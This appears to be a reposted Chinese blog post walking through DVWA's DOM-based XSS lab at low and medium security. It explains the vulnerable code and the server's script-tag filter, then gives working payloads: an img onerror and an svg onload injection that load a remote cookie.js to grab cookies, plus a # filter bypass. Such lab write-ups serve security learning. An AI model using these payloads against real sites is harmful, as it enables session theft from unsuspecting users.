信息安全之路-web-xss学习(3)

最新推荐文章于 2022-02-17 09:22:01 发布

a6831115

最新推荐文章于 2022-02-17 09:22:01 发布

阅读量251

点赞数

文章标签： php javascript ViewUI

原文链接：http://www.cnblogs.com/qianxinggz/p/9844120.html

版权

DOM型xss

DOM型xss属于在客户端执行的xss，并不经过服务端解析。测试过程如下
Low型：
源代码：

<script>
    if (document.location.href.indexOf("default=") >= 0) {
    var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
    document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
    document.write("<option value='' disabled='disabled'>----</option>");
    }
    document.write("<option value='English'>English</option>");
    document.write("<option value='French'>French</option>");
    document.write("<option value='Spanish'>Spanish</option>");
    document.write("<option value='German'>German</option>");
</script>
}

解析：
JavaScript indexOf() 方法
indexOf() 方法可返回某个指定的字符串部分·在字符串中首次出现的位
置，该位置的值按照字符的个数来数
document.location.href= " http://www.baidu.com " ;//转到百度
substring 方法用于提取字符串中介于两个指定下标之间的字符
substring(start,end)，前者必选，后者可选
以上js代码判断url链接中是否有默认字符串，并将default后面的值赋给
option标签的value属性节点和文本节点，花括号后的语句则是输出另外
的选择框
Low型服务端没有任何过滤，直接构造payload绕过

Payload:
http://www.dvwa.com/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(%22xss%22)%3C/script%3E

medium

<script>
    if (document.location.href.indexOf("default=") >= 0) {
    var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
    document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
    document.write("<option value='' disabled='disabled'>----</option>");
    }

    document.write("<option value='English'>English</option>");
    document.write("<option value='French'>French</option>");
    document.write("<option value='Spanish'>Spanish</option>");
    document.write("<option value='German'>German</option>");
</script>
}

服务端代码：

<?php
// Is there any input?if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];

    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}
?>

绕过方式
Stripos过滤了script标签，同时也防止了大小写，考虑换一个标签执行
于是有标签跳转，原理是onerror事件会在文档或图片加载过程中发生错误时被触发，支持该事件的HTML（标签有：img,object,style;），所以设置src=#，就会跳转执行onerror，其后的属性会被当做js执行。

Payload：default=</option></select><img src=# onerror="var b= 
document.createElement('script'); b.setAttribute('src','http:
//www.dvwa.com/dvwaxss/cookie.js');document.getElementsByTagName
('head')[0].appendChild(b);">

ps：注意闭合《select>标签和标签
思考:
第一个考虑unicode编码但是并没有弹窗,发现在服务端并没有拦截该代码，该代码同样也在客户端解析了，但是无弹窗（原因未知）

参照教程使用了《script>alaert(“xss”)，《script>标签被过滤，替换成了English，
加上#号后绕过过滤。
没有《select》标签闭合

有该标签闭合，可以加载

Svg标签绕过:
还有svg的标签可以获取cookie，

?default=</option></select><svg onload="var b= document.createElement('script'); b.setAttribute('src','http://www.dvwa.com/dvwaxss/cookie.js');document.getElementsByTagName('head')[0].appendChild(b);">

转载于:https://www.cnblogs.com/qianxinggz/p/9844120.html

a6831115

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
信息安全之路-web-xss学习(3)

DOM型xssDOM型xss属于在客户端执行的xss，并不经过服务端解析。测试过程如下Low型：源代码：<script> if (document.location.href.indexOf("default=") >= 0) { var lang = document.location.href.substring(document.locat...
复制链接

扫一扫